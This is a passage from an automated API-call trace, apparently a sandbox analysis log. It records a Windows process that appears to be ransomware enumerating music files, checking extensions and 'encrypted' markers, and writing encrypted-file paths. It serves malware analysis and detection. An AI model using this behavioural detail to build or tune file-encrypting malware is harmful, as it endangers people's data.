lpNewFilePointer=0x0) returned 1 [0037.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.encrypted.m4a\r\n", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0037.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x7ab338 [0037.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.encrypted.m4a\r\n", cchWideChar=60, lpMultiByteStr=0x7ab338, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 60 [0037.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.318] WriteFile (in: hFile=0x140, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3b, lpOverlapped=0x0) returned 1 [0037.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.318] CloseHandle (hObject=0x140) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.319] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.319] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.320] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.320] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.320] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.320] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.320] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.321] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.321] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889b08 [0037.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.321] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4rukxk6sjcr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.322] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.322] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.322] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.322] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.322] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0037.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.322] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.322] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.323] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.323] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.323] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.323] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.323] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.323] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0037.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0xed260310, ftLastWriteTime.dwHighDateTime=0x1d5bd12, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0x7c20c0 [0037.324] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.324] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0xed260310, ftLastWriteTime.dwHighDateTime=0x1d5bd12, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0x7c20c0 [0037.325] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.325] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\4RuKxK6SJcR.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.326] CompareStringW 